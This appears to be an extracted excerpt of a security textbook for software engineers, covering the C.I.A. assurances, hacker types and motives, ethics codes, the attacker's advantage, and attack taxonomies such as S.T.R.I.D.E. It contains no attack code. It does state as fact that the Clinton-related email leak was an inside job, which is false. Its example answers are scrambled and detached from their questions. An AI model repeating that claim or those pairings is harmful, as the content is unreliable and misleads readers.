Security For Software Engineers (PDFDrive)
Security For Software Engineers (PDFDrive)
James Helfrich
CRC Press
Taylor & Francis Group
6000 Broken Sound Parkway NW, Suite 300
Boca Raton, FL 33487-2742
This book contains information obtained from authentic and highly regarded sources. Reasonable efforts have been made to publish reliable data and
information, but the author and publisher cannot assume responsibility for the validity of all materials or the consequences of their use. The authors and
publishers have attempted to trace the copyright holders of all material reproduced in this publication and apologize to copyright holders if permission
to publish in this form has not been obtained. If any copyright material has not been acknowledged please write and let us know so we may rectify in any
future reprint.
Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced, transmitted, or utilized in any form by any electronic,
mechanical, or other means, now known or hereafter invented, including photocopying, microfilming, and recording, or in any information storage or
retrieval system, without written permission from the publishers.
For permission to photocopy or use material electronically from this work, please access www.copyright.com (http://www.copyright.com/) or contact
the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive, Danvers, MA 01923, 978-750-8400. CCC is a not-for-profit organization that provides
licenses and registration for a variety of users. For organizations that have been granted a photocopy license by the CCC, a separate system of payment
has been arranged.
Trademark Notice: Product or corporate names may be trademarks or registered trademarks, and are used only for identification and explanation
without intent to infringe.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 00: Security for Software Engineers | 1
Chapter 00: Security for Software Engineers
If there is only one thing to learn from computer security, it is the three assurances. C.I.A. is infused in every
aspect of the security problem and is the foundation of this subject.
Computer security It is easy to see how computer security is an important component of our
can be defined increasingly digital and interconnected lifestyle. It is less obvious to see how that
as providing plays out in the daily life of a software engineer. In fact, most of the traditional
confidentiality, computer security activities are not performed by software engineers at all. These
integrity, and are handled by Information Technology (IT) personnel, performing such tasks as
availability incident response (dealing with an attack that is underway), forensics (figuring
assurances to out what happened after an attack has occurred), patching software (making sure
users or clients of that all the software on the system is hardened against known attacks),
information systems configuring virus scanners and firewalls (making sure the protection mechanisms
in place are consistent with policy), and setting file permissions (ensuring that
only the intended users have access to certain resources). We will only briefly
touch upon these topics. What, then, does a software engineer do?
A software engineer needs to know how to engineer software so that
confidentiality, integrity, and availability assurances can be made. It means that
2 | Chapter 00: Security for Software Engineers | Unit 0: Introduction to Security | Security for Software Engineers
the design and implementation of computer systems must have the minimal
number of vulnerabilities that an attacker can exploit. This imperative is the focus
of this textbook: helping software engineers keep their jobs.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 00: Security for Software Engineers | 3
Examples
1. Q Classify the following as a confidentiality, integrity, or availability attack: The
attacker changes my account settings on Facebook so my pictures are visible to
the world.
A Integrity. The user’s data has been altered without permission. Note that the
president still has confidentiality (no private data has been shared) and
availability (we have no reason to believe that the home page is not accessible).
Exercises
1 From memory, define C.I.A. and explain in your own words what each
component means.
4 | Chapter 00: Security for Software Engineers | Unit 0: Introduction to Security | Security for Software Engineers
Problems
1 Debate topic: Who is more important in providing security assurances to users,
the IT professional or the software engineer? Justify your answer and provide
links to any relevant research.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 00: Security for Software Engineers | 5
Chapter 01: Roles
There is no need to memorize the various flavors of black hats and white hats. The purpose of this chapter
is to illustrate why people become black hats and what they are trying to accomplish. Only by understanding
their motives can white hats thwart their efforts and provide security assurances.
In an overly simplistic view of computer security, there are the bad guys (black
hats) and the good guys (white hats) competing for your computational
resources. One would be tempted to think of security as a faceoff between two
equally matched opponents. This analogy, however, does not hold. It is more
accurate to think of the black hats mounting a siege to spoil a castle’s treasures
and the white hats defending the castle. Our names are derived from the classical
Western movies that dominated Hollywood fifty years ago. The bad guys were
readily identified by their black hats (and their tendency to end up in jail!) and the
good guys by their white hats (and their tendency to ride off into the sunset with
the pretty girl).
Black Hats
Black hats are individuals who attempt to break the security of a system without
legal permission. The legal permission is the most important part of that
Black Hats: definition because it distinguishes a white hat sneaker from a black hat. With
Those who attempt permission, a hacker is a sneaker. Without permission, he or she is a criminal.
to break the security As the common saying goes, “Keep your friends close. Keep your enemies closer.”
of a system In order to defend ourselves against the attacks of the adversary, it is essential to
without permission understand what makes him or her tick. This chapter addresses that need.
Through the years, there has been an evolution of the black hat community. The
first generation were hackers, those pushing the boundaries of what is possible.
They were motivated by pride and curiosity. This was the dominant archetype
until lucrative economic models existed where people could make a living
hacking. This led us to the second generation of black hats: criminals. With strong
economic motivations behind developing tools and techniques, considerable
advances were made. Perhaps not surprisingly, it did not take long for the big
players to recognize the power that hacking offered. This led to the current
generation of hackers: information warriors. They are motivated by power.
6 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
As the definition implies, the goal of a hacker is not to steal or destroy. Rather the
First Generation: goal is to see what is possible. There is one big difference between this first
Black Hats motivated generation of black hats and the rest of the computer community: Hackers have
by curiosity and pride. “non-traditional” personal ethical standards. In most cases, they do not believe
that their activities are wrong. This is even true when real damage results from
their behavior; they often blame the author of the vulnerability for the damage
rather than themselves.
The first generation of black hats emerged when computers became available to
every-day users in the 1970’s. It was not until the 1980’s that became somewhat
mainstream. Hackers filled the black hat ranks until the second generation
became the dominant force in the late 1990’s.
Mentality of a Hacker
One great source for understanding the mentality of a hacker is their writings.
Probably the most widely read example of this was a small essay written by the
hacker Loyd Blankenship on January 8, 1986 shortly after his arrest.
The researcher Sarah Gordon performed a series of in-depth studies of hacking
communities in the early 1990’s and again a decade later (Gordon, 1999). Her
findings are among the most descriptive and illuminating of this first generation
of hackers. One of the key observations was that many of the virus writers were
socially immature, moving out of the virus writing stage as they matured socially
and had more stake in society. In other words, most “grew up.”
Labels
There are many labels associated with the first generation of hackers:
Phreak Dated term referring to a cracker of the phone system. Many attribute phreaking
as the ancestor of modern hacking. They noticed that the phone company would
send signals through the system by using tones at specific frequencies. For
example, the signal indicating that a long distance charge was collected by a pay-
phone was the exact frequency of the Captain Crunch whistle included with a
popular breakfast cereal.
Steve Jobs and Steve Wozniak, future co-founders of Apple Computers, built a
“blue-box” made from digital circuits designed to spoof the phone company
routing sequence by emitting certain tone frequencies. They sold their device for
$170 apiece. They were never arrested for their antics, though they were
questioned. While they were using a blue-box on a pay phone in a gas station,
a police officer questioned them. Steve successfully convinced the officer that
the blue-box was a music synthesizer.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 01: Roles | 7
Cracker One who enjoys the challenge of black hat activities. Crackers would often break
into school computers, government networks, or even bank computers just to
see if it could be done. They would then write about their exploits in cracker
journals such as 2600 or Phrack. We generally avoid the term “Hacker” because
it could also mean someone who has good intentions.
Cyberpunk A contemporary combination of hacker, cracker, and phreak. The writings of
cyberpunks often carry an air of counter-culture, rebelling against authority and
main stream lifestyles. An example would be Loyd Blankenship, the author of the
Hacker’s Manifesto.
Thrill Seeker A curious individual wanting to see how far he or she can go. Often the actions
of thrill seekers are not premeditated or even intentional.
A 15-year-old high school student named Rick Skrenta was in the habit of
cracking the copy-protection mechanism on computer games and distributing
them to his friends. Just for fun, he often attached self-replicating code to these
programs that would play tricks on his friends. One of these programs was
called “Elk Cloner” which would display a poem on his victim’s computer
screen: “Elk Cloner: The program with a personality.”
Demigod Experienced cracker, typically producing tools and describing techniques for use
of others. Though many may have communal motivational structures, others
just want to advance the cause. Most demigods would use an assumed name
when describing their exploits.
Many consider Gary McKinnon the most famous and successful demigod of
modern times. In one 24 hour period, he shut down the Washington D.C.
network of the Department of Defense.
Script Kiddie Short on skill but long on desire; often use tools developed by more experienced
demigods. However, because the tools developed by demigods are often so
well-developed, script kiddies can cause significant damage.
A 15-year-old boy living in Northern Ireland was arrested in October 2015 for
exploiting a known vulnerability in the communication company TalkTalk
Telecom Group PLC. After obtaining confidential information, he attempted an
extortion racket by demanding payment for not publicly releasing the
information.
Technological Hacker Tries to advance technology by exploiting defects. They see their activities as
being part of the Internet’s immune system, fighting against inferior or
unworthy software/systems.
Grey Hats: There is one additional important member of this category. Recall that black hats
are the “bad guys” and operate outside the law whereas white hats are the “good
First generation black hats
guys” and operate to protect the interests of legitimate users. What do you call
motivated by the challenge of
an individual who operates outside the law but to protect legitimate users? The
finding vulnerabilities and
answer is “grey hats.”
increasing system security.
8 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
Are grey hats a third category, distinct between white hats and black hats alike?
The answer is “no.” They operate outside the law and are thus black hats.
However they are motivated by curiosity and challenge: to see if they can find
vulnerabilities. For this reason, they are members of the first generation.
Reach It is possible to reach large numbers of potential victims. This means hacking
can be profitable with only a small success rate.
Shane Atkinson sent an average of 100 million SPAM messages a day in 2003.
This was accomplished with only 0.1% - 0.7% of his attempts to send a given
message being successful, and only 0.1% - 0.9% of those were read by humans.
Each of these has convinced many of the first generation of hackers to continue
with the work they enjoy rather than finding a more socially acceptable job.
Organized Cybercrime
With the advent of cutting-edge malware tools, viable business models, and little
risk of law enforcement interference, it was not long before ad-hoc cybercrime
migrated into sophisticated criminal organizations similar to the mafia. While
organized cybercrime originated in Russia with the Russian Business Network
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 01: Roles | 9
(RBN), many similar organizations have appeared in other countries (Ben-Itzhak,
2009).
Labels
There are many labels associated with the second generation of hackers. A
common underlying theme is their monetary motivation.
Economic Hacker Generic term used to describe all individuals who commit crimes using
computers for personal gain. In other words, this term is interchangeable with
“second generation black hat.”
Criminal A criminal is someone who steals or blackmails for gain. The only difference
between a common thief and a black hat criminal is the role of computers in the
crime. It is relatively rare for a criminal to move from the physical world (such
as robbing banks or stealing cars) to the virtual world (such as breaking into
networks or stealing credit card numbers from databases). The reason is that
the skills necessary to commit cybercrime could also be used in a high-paying
job. In other words, most black hat criminals pursue that line of work because
they have nothing to lose or they feel they can be better paid than they would
in a white hat role.
Insider Use their specialized knowledge and insider access to wreak havoc. Inside
attacks are difficult to protect against because their behavior is difficult to
distinguish from legitimate work they normally would be doing.
Late in the 2016 presidential elections, the Democratic candidate Hillary
Clinton’s private e-mail server was hacked. As a result, tens of thousands of
private e-mails were posted on the hacker site Wikileaks. While it was
originally thought that Russian hackers were responsible in an attempt to sway
the presidential election, it was later discovered that the hacked server was an
inside job.
10 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
Spacker Finding vulnerabilities and leveraging exploits for the purpose of sending SPAM.
To this day, SPAM is one of the largest economic motivations for black hats. A
skilled SPAMMER can make tens of thousands of dollars in a single SPAM run.
Today SPAMMERS are far more specialized than they were 20 years ago. Some
specialize in stealing e-mail lists. Others specialize in building and maintaining
botnets that send the messages. Finally, others specialize in creating the
messages designed to sell a given product or service. All of these would be
considered spackers.
GRUM (a.k.a. Tedroo) was the largest SPAM botnet of 2016. With 600,000
compromised computers in the network, it sent 40 billion emails a day. At the
time, this was about 25% of the total SPAM generated worldwide.
Corporate Raider Looks for trade secrets or other privileged industrial information for the
purpose of exploiting the information for profit. Some corporate raiders are
employed by organizations. It is more common to find freelancers who sell
information to interested parties. Corporate raiders often work across country
boundaries to protect themselves from arrest. China, Ukraine, and Russia are
hot-beds for corporate raiders today.
Codan is an Australian firm that sells, among other things, metal detectors. In
2011, Chinese hackers were successful in stealing the design to their top selling
metal detector. A few months later, exact copies of this metal detector were
being sold world-wide for a fraction of the cost, causing serious long-term
damage to Codan. Their annual profits fell from $45 million to $9.2 million in
one year. Due to complications in computer crime cases and difficulties
pursuing criminals across national borders, the Australian government was
unable to protect Codan.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 01: Roles | 11
Terrorist Similar to a governmental hacker except not directly sponsored by a recognized
government. Often terrorist activities are covertly coordinated by a government
but frequently they operate independently. Terrorists are similar to Hacktivists;
the terms are often used interchangeably.
On the 24th of March, 2016, Andrew Auernheimer (a.k.a. Weev) hijacked
thousands of web-connected printers to spread neo-Nazi propaganda. This
hack was apparently accomplished with a single line of a Bash script.
White Hats
While the role of white hats in the computer security space may be varied, two
common characteristics are shared with most white hats:
Ethics Their activity is bounded by rules, laws, and a code of ethics.
Defense They play on the defensive side. Any activity in an offensive role can be traced
to strengthening the defense.
The distinguishing characteristic of white hats is their work to uphold the law and
provide security assurances to users. For the most part, this puts them in the
defensive role. There are exceptions, however. Some police white hats actively
attack the computer systems of known criminals.
12 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
Ethics
One of the fundamental differences between a white hat and a black hat is that
white hats operate under a code of ethics. Possibly this statement needs to be
stated more carefully: even communal black hats have a code of ethics. These
ethics, however, may be somewhat outside the societal norms.
The Code of Ethics defined by ICS2 is universally adopted by white hats around
the world. While the principles are broadly defined and are laced with subjective
terms, they provide a convenient and time-tested yardstick to measure the
ethical implications of computing activities ((ISC)², 2017).
White hats have the responsibility to protect society from computer threats.
They do this by protecting computer systems from being compromised by
Protect
attackers. They also have the responsibility to teach people how to safely use
computers to help prevent attacks.
They must act honorably by telling the truth all the time. They have the
Act Honorably responsibility to always inform those who they work for about what they are
doing.
They should also give prudent advice. They should treat everyone else fairly.
Provide Service
White hats should provide diligent and competent service.
They should show respect for the trust and privileges that they receive. They
Advance the
should only give service in areas in which they are competent. They should avoid
Profession
conflicts of interest or the appearance thereof.
The ACM (Association for Computing Machinery) adopted a more verbose set of
guidelines, consisting of three imperatives (Moral, Professional, and
Organizational Leadership) split into 22 individual components (ACM, 1992).
Labels
There are several broad classifications of white hats: decision makers, IT
professionals, and software engineers.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 01: Roles | 13
Political leaders People who create laws surrounding computer resources can be considered
white hats. Typically they are not as knowledgeable about technical issues as
other white hats, but they are often informed by experts in the industry.
Law Enforcement The police, FBI, and even the military are white hats as they enforce the laws
and edicts of political leaders.
Executives Fulfilling basically the same role as political leaders, executives make policy
decisions for organizations. In this way, they serve as white hats.
Educators Teachers, workshop leaders, and authors are an important class of white hats,
serving to inform people about security issues and help people be more security
aware. Parents also fall into this category.
Journalists Reporters, columnists, and bloggers fulfill a similar role as educators.
Administrator A person who manages a network to keep computers on the network secure.
Software Engineer An individual who creates software to users and clients that provides
confidentiality, integrity, and availability assurances.
Sneaker An individual tasked with assessing the security of a given system. Sneakers use
black hat tools and techniques to attempt to penetrate a system in an effort to
find vulnerabilities.
Penetration Tester An individual tasked with probing external interfaces to a web server for the
purpose of identifying publicly available information and estimating the overall
security level of the system.
Tiger Team A group of individuals conducting a coordinated analysis of the security of a
system. Some tiger teams function similarly to those of sneekers while others
also analyze internal tools and procedures.
The final category of white hats is software engineers. Their job is to write code
that is resistant to attacks. Every software engineer needs to be familiar with
security issues and think about ways to minimize vulnerabilities. This is because
it is not always apparent when a given part of a program may find itself in a
security-critical situation.
Probably the most common security activity of a software engineer is to write
code that is lacking vulnerabilities. A software vulnerability is usually a bug
resulting in behavior different than the programmer’s intent. If the resulting
behavior compromises the user’s confidentiality, integrity, or availability, then a
security vulnerability exists. Thus, vulnerabilities are special forms of bugs. For
the most part, standard software engineering practices avoid these bugs.
A second activity is to locate vulnerabilities already existing in a given codebase.
This involves locating the security-critical code and looking for bugs known to
cause problems. As you can well imagine, this is a tedious task.
A final activity is to integrate security features into code. This may include
authentication mechanisms or encryption algorithms. In each case, the feature
must be integrated correctly for it to function properly. The software engineer
needs to have a deep understanding of these features to do this job properly.
14 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
Attacker’s Advantage
Black hats and white hats thus have different roles and are typically involved in
different activities. The black hats (the attackers) have innate advantages over
the white hats (the defenders). This advantage persists whether the attackers are
an invading army or the cyber mafia. The attacker’s advantage has four parts
(Howard & LeBlanc, 2003):
The defender must Attackers are free to choose the point of attack. This is typically the weakest or
defend all points; most convenient point in the defense system. This forces the defender to evenly
the attacker can choose distribute resources across the entire perimeter. Otherwise, the attacker will
the weakest point choose the point where the defensive forces are weakest. The Germans exploited
this advantage in WWII. Rather than invading France through the heavily fortified
Maginot Line (spanning the entire France – German border), they went through
the lightly defended Low Countries thereby completing the campaign in six weeks
with minimal casualties.
The defender can defend While the many attack vectors are generally known by both the attackers and the
only against known attacks; defenders, there exists a much larger set of yet-to-be-discovered attack vectors.
the attacker can probe It is highly unlikely that both the attackers and the defenders will make a
for unknown vulnerabilities discovery about the same novel attack at the same time. Thus, exploiting
previously unknown (novel) attack vectors is likely to be successful for attackers
and fixing novel attack vectors is likely to have no impact on attackers. Back to
our WWII examples, the Germans created a novel attack vector with the V2
ballistic missile. The world had never seen such a weapon before and the British
were completely unable to defend against it.
The defender must be Similar to the “weakest point” advantage, the defender cannot let down his
constantly vigilant; defenses at any point in time, lest the enemy choose that moment to attack. This
the attacker can advantage was exploited in WWII when the Japanese launched a surprise attack
strike at will against the United States in Pearl Harbor. The defending Army and Navy “stood
down” on Sunday morning with the minimum complement of men on duty. The
attacking Japanese airplanes met no resistance on their approach to the target
and lost little during the ensuing attack.
The defender must Defender’s activities are known and open to the scrutiny of the public. Attacker’s
play by the rules; activities, on the other hand, need to be secretive or the law would persecute
the attacker can them. This means defender activities are constrained by the law and attackers
play dirty are free to use any means necessary to achieve their objectives. In the months
leading up to WWII, the defending Allies contended with Hitler’s aggression using
diplomacy within the framework of international law. Hitler, realizing the act of
invasion was already against the law, was free to pursue any course he chose to
achieve his objectives.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 01: Roles | 15
Examples
1. Q Classify the following example as a white hat or a black hat: An Islamic extremist
sponsored by the ISIS decides to deface the CIA website.
2. Q Classify the following example as a white hat or a black hat: A parent cracks their
child’s password to view Facebook posts.
A White Hat - Executives. Parents are white hats because they are operating
within their legal rights to monitor the activities of their underage children. They
are operating in a similar role as an executive if you consider the family unit as
an “organization.” Since it is the parent’s responsibility to “make policy
decisions,” they are executives.
A The short answer is “No” because the act of breaking the law makes the
individual a black hat. However, there are infrequent cases where following the
law is an illegal act (such as a soldier being ordered to kill an innocent citizen)
and equally infrequent cases where failing to act due to law is an immoral act
(such as not jay-walking to help a man having a heart attack across the street).
In limited situations such as these, breaking the law does not make someone a
black hat.
A Second generation. Frank was essentially a thief, using his hacking skills for
financial benefit.
A First generation. Robert wanted to see if his creation would come to life. He had
no economic or political stake in the outcome.
16 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
follows that the Department of Defense needs to have a cyber army to fulfill its
objectives.
7. Q Find a recent malware outbreak reported on the news or by a security firm. Was
this malware authored by a 1st, 2nd, or 3rd generation black hat.
8. Q A police officer decides to go “under the radar” for an hour and patrol a
neighborhood outside his jurisdiction. Which aspect of the Code of Ethics did he
break?
A Act Honorably. By hiding his activities, he is failing to “tell the truth at all times”
and he is failing to “inform those for whom [he] work[s] for what [he is] doing.”
A Protect. “White hats have the responsibility to protect society.” This goes
beyond the boundaries of the job title. Doctors have similar responsibilities,
begin required to provide service regardless of whether they are on duty.
10. Q A small business owner has noticed a string of authentication attempts from the
same IP address. Looking at the logs, it is clear that someone is trying to guess
his password. Is it ethical for this owner to launch a counter-attack and shut
down the computer on this IP address?
A No. According to the code of ethics, white hats are to act honorably. Launching
an illegal attack is not an honorable action. This is especially true if the owner is
not given a chance to stop the attack and if the police are not informed. That
being said, if the police give permission or the owner of the IP address or ISP
(Internet Service Provider) gives permission, then the counter-attack is ethical.
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 01: Roles | 17
Exercises
1 From memory, list and define the attacker’s advantage.
3 Up until the late 1990’s, what were the most common reasons for writing a
piece of malware?
5 What generation of hacker is Rich Skrenta, the author of the first documented
virus (Elk Cloner) released into the world?
I had been playing jokes on schoolmates by altering copies of pirated games to
self-destruct after a number of plays. I'd give out a new game, they'd get
hooked, but then the game would stop working with a snickering comment
from me on the screen (9th grade humor at work here). I hit on the idea to leave
a residue in the operating system of the school’s Apple II. The next user who
came by, if they didn't do a clean reboot with their own disk, could then be
touched by the code I left behind. I realized that a self-propagating program
could be written, but rather than blowing up quickly, to the extent that it laid
low it could spread beyond the first person to others as well. I coded up Elk
Cloner and gave it a good start in life by infecting everyone’s disks I could get
my hands on. (Skrenta, 2007)
18 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
Problems
1 If there were such a thing as a defender’s advantage (analogous to the attacker’s
advantage), what would it be?
2 Debate topic: For most of human history, “ethics” and “warfare” were seldom
mentioned in the same sentence. This changed during medieval times as
chivalry and honor became important attributes for knights and other types of
soldiers. Today, the Geneva Convention and similar rules govern modern
warfare to a degree. The question remains, should ethics be a consideration in
computer security or should we just strive to win the war?
6 Find a recent malware outbreak reported on the news or by a security firm. Was
this malware authored by a 1st, 2nd, or 3rd generation black hat?
7 If you were building an e-commerce web site, what could you do to discourage
the 1st generation of black hats?
8 If you were building an e-commerce web site, what could you do to discourage
the 2nd generation of black hats?
9 Please find and read the “Hacker’s Manifesto.” What can we learn from this
article?
10 Do you think hackers are the Internet immune system, or do you think we need
another immune system?
Security for Software Engineers | Unit 0: Introduction to Security | Chapter 01: Roles | 19
11 Should law enforcement officers be allowed to use black hat techniques for the
purpose of providing security assurances to the public?
12 Robin Hood was a mythical figure known for “robbing from the rich and giving
to the poor.” Robin Hood hackers, on the other hand, probe web sites without
the knowledge or permission of the owner for the purpose of revealing their
findings to the owner. Reactions to these activities are mixed. Some site
managers are grateful for the provided services while other press charges. Do
you feel that Robin Hooders are white hats or black hats?
13 A hacker organization called “Anonymous” has been formed for the express
purpose of conducting attacks on the Internet. Are their actions and methods
justified?
14 While the law enforcement agencies are called to protect citizens from the
exploits of the lawless, it is still the responsibility of the individual to take basic
steps to protect himself. This responsibility extends to the times when the
government itself does not fulfill its responsibilities and no longer serves its
constituents. Hansen claims it is the responsibility of a patriot to “overthrow
duly constituted authorities who betray the public trust.” Do you agree?
16 A few years back, a hacker found a way to discover the list of people accepted
to the Harvard MBA program. Do you feel that the hacker broke a law or acted
immorally?
20 | Chapter 01: Roles | Unit 0: Introduction to Security | Security for Software Engineers
Unit 1: Attack Vectors
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 01: Roles | 21
Chapter 02: Classification of Attacks
The essential skill of this chapter is to recognize the many different ways an attack can be manifested. Only
by understanding all of these attack vectors can we take steps to prevent them.
The first step in writing secure code is to understand how black hats exploit
vulnerabilities. For this to be done, a few terms need to be defined.
Asset An asset is something of value that a defender wishes to protect and the attacker
wishes to possess. Obvious assets include credit-card numbers or passwords.
Other assets include network bandwidth, processing power, or privileges. A
user’s reputation can even be considered an asset.
Threat A threat is a potential event causing the asset to devalue for the defender or
come into the possession of the attacker. Common threats to an asset include
transfer of ownership, destruction of the asset, disclosure, or corruption.
Vulnerability A threat to an asset cannot come to pass unless there exists a weakness in the
system protecting it. This weakness is called a vulnerability. It is the role of the
software engineer to minimize vulnerabilities by creating software that is free of
defects and uses the most reliable asset protection mechanisms available.
Risk A risk is a vulnerability paired with a threat. If the means to compromise an asset
exists (threat) and insufficient protection mechanisms exist to prevent this from
occurring (vulnerability), then the possibility exists that an attack may happen
(risk).
Attack An attack is a risk realized. This occurs when an attacker has the knowledge, will,
and means to exploit a risk. Of course not all risks result in an attack, but all
attacks are the result of a risk being exploited.
Mitigation Mitigation is the process of the defender reducing the risk of an attack. Attacks
are not mitigated; instead risks are mitigated. There are two fundamental ways
this can be accomplished: by reducing vulnerabilities or by devaluing assets.
An attack vector is the path an attacker follows to reach an asset. This may include
more than one vulnerability or more than one asset. To see how these concepts
are related, consider the following scenario: a malicious student wishes to change
his physics grade on the school’s server. First we start with the asset: the grade.
Next we consider the threat: damage the integrity of the grade by altering the
data on the school’s server. The intent of the system is for this threat to be
impossible. If a vulnerability in the system exists, then the threat is possible. This
may happen if one of the administrators uses unsafe password handling
procedures. Consider the case where one of the employees in the registrar’s
office keeps his password written on a post-it note under his keyboard. Now we
have a risk: a malicious student could obtain that password and impersonate the
administrator. This leads us to the attack. Our malicious student learns of the
post-it note and, when no one is looking, writes down the password. The next day
22 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
he logs in as the administrator, navigates to the change-grade form, and alters
the grade. Fortunately, an alert teacher notices that the failing physics grade was
changed to an ‘A’. With some work, the source of the problem was identified.
Mitigation of this attack vector is then to create a university policy where no
passwords are to be written down by employees.
Classification of Attacks
Software engineers are concerned about attack vectors because they illustrate
the types of vulnerabilities that could yield an asset being compromised. An
important part of this process is classification of possible attacks. There are three
axes or dimensions of this classification process: the state of the asset, the type
of assurance the asset offers, and the type of vulnerability necessary for an attack
to be carried out. These three axes are collectively called the McCumber Cube
(McCumber, 1991).
Classification schemes are useful not only in precisely identifying a given attack
that has transpired or is currently underway (an activity more in line with an I.T.
professional than a software engineer), but also to brainstorm about different
attack vectors that may be possible at a given point in the computing system.
Figure 02.1: McCumber Cube Perhaps it is best to explain these attributes by example. Consider a bank
attempting to prevent a thief from misusing client assets (money in this case).
The thief has a wide range of options available to him when contemplating theft
of the assets.
Type of Asset
The asset face of the McCumber Cube maps directly to the three security
assurances. While we analyze these independently, it is important to realize that
most user assets are a combination of the three.
Confidentiality is the assurance that the software system will keep the user’s
private data private. This could also be described as the assurance that only the
owner of an asset can specify how the asset is viewed.
Attacks of confidentiality are called disclosure attacks. If an individual views an
asset contrary to the wish of the owner, then a confidentiality breech or a
Confidentiality
disclosure attack has occurred.
Back to the aforementioned bank example, this will assure the client of a bank
that his account balance will not be disclosed to the public. The attacker does not
need to steal the client’s money to attack the money; he can simply post the
client’s bank statement onto the front door of the bank.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 23
The assurance is that the software system will preserve the user’s data. It is a
promise that the data is not destroyed, will not be corrupted accidentally, nor
will it be altered maliciously. In other words, the user’s asset will remain in the
same condition in which the user left it. In this digital age, it is difficult to make
integrity guarantees. Instead, the best we can hope for is to detect unauthorized
tampering.
Attacks on integrity are called alteration attacks. If a change has been made to
Integrity
the user’s data contrary to his will, then integrity has been compromised or an
alteration attack has occurred.
In the banking example, there are many ways in which the attacker can launch
an alteration attack. He could steal the contents of the client’s safety deposit box,
he could alter the password to the client’s account, or he could deface the bank’s
website. In each case, the state of one of the bank’s assets has changed in a way
that was contrary to the bank’s will.
The availability assurance is that the user can have access to his informational,
computational, or communication resources when he requires it. As with the
integrity assurance, this includes resistance to availability problems stemming
from software defects as well as denial attacks from individuals with malicious
intent.
Attacks on availability are called denial attacks, also known as denial of service
(D.o.S.). If an attacker is able to disrupt the normal operation of a system in such
Availability a way that the availability of system resources is impacted, then a denial attack
has occurred.
In the banking example, there are many ways that an attacker can launch a denial
attack. He could put sleeping gas in the ventilation system temporarily
incapacitating the employees, he could get a hundred of his friends to flash-mob
the bank thereby consuming all the time and attention of the clerks, or he could
detonate a bomb in the building destroying everything inside. In other words,
denial attacks can be inconveniences, temporary outages, or permanent outages.
S.T.R.I.D.E.
The S.T.R.I.D.E. taxonomy was developed in 2002 by Microsoft Corp. to enable
software engineers to more accurately and systematically identify defects in code
they are evaluating. The S.T.R.I.D.E. model is an elaboration of the more familiar
C.I.A. model but facilitates more accurate identification of security assets. There
are six components of S.T.R.I.D.E. (Howard & LeBlanc, 2003).
24 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
Spoofing identity is pretending to be someone other than who you really are such
as by getting access to someone else’s passwords and then using them to access
data as if the attacker were that person. Spoofing attacks frequently lead to other
types of attack. Examples include:
Spoofing
x Masking a real IP address so another can gain access to something that
otherwise would have been restricted.
x Writing a program to mimic a login screen for the purpose of capturing
authentication information.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 25
Denial of Service (D.o.S) is another common type of attack involving making
service unavailable to legitimate users. D.o.S. attacks can target a wide variety of
services, including computational resources, data, communication channels,
time, or even the user’s attention. Many organizations, including national
governments, have been victims of denial of service attacks. Examples include:
x Getting a large number of people to show up in a school building so that
Denial of Service classes cannot be held.
x Interrupting the power supply to an electrical device so it cannot be used.
x Sending a web server an overwhelming number of requests, thereby
consuming all the server’s CPU cycles. This makes it incapable of responding
to legitimate user requests.
x Changing an authorized user’s account credentials so they no longer have
access to the system.
Elevation of privilege can lead to almost any other type of attack, and involves
finding a way to do things that are normally prohibited. In each case, the user is
not pretending to be someone else. Instead, the user is able to achieve greater
privilege than he normally would have under his current identity. Examples
Elevation of include:
Privilege
x A buffer overrun attack, which allows an unprivileged application to execute
arbitrary code, granting much greater access than was intended.
x A user with limited privileges modifies her account to add more privileges
thereby allowing her to use an application that requires those privileges.
In most cases, a single attack can yield other attacks. For example, an attacker
able to elevate his privilege to an administrator can normally go on to delete the
logs associated with the attack. This yields the following threat tree (figure on the
left).
In this scenario, an elevation of privilege attack can also lead to a repudiation
attack. Figure 02.2 is a graphical way to represent this relation. There are many
reasons why threat trees are important and useful tools. First, we can easily see
the root attack that is the source of the problem. Second, we can see all the
attacks that are likely to follow if the root attack is successful. This is important
Figure 02.2: Simple
attack tree
because often the root attack is not the most severe attack in the tree. Finally,
the threat tree gives us a good idea of the path the attacker will follow to get to
the high value assets.
26 | Chapter 02: Classification of Attacks | Unit 1: Attack Vectors | Security for Software Engineers
In many situations, the threat tree can involve several stages and be quite
involved. Consider, for example, an attacker that notices that unintended
information is made available on an e-commerce site. From this disclosure, the
attacker is able to impersonate a normal customer. With this minimal amount of
privilege, the attacker pokes around and finds a way to change the user’s role to
administrator. Once in this state, the attacker can wipe the logs, create a new
account for himself so he can re-enter the system at will, sell confidential
information to the highest bidder, and shut down the site at will. The complete
threat tree for this scenario is the figure on the left.
One final thought about threat trees. It is tempting to simply address the root
problem, believing that the entire attack will be mitigated if the first step is
Figure 02.3: Somewhat
complex attack tree
blocked. This approach is problematic. If the attacker is able to find another way
to get to the head of the threat tree through a previously unknown attack vector,
then the entire threat tree can be realized. It is far safer to attempt to address
every step of the tree. This principle is called “defense in depth.”
Information States
The second dimension of the McCumber Cube is the state in which information
assets may reside. Though most problems focus on one or two states, it is not
uncommon for a problem to span all three states.
This is also called “data at rest.” Examples include data on a hard disk, data in
memory, or even data in a register. Any data that is not currently being used or
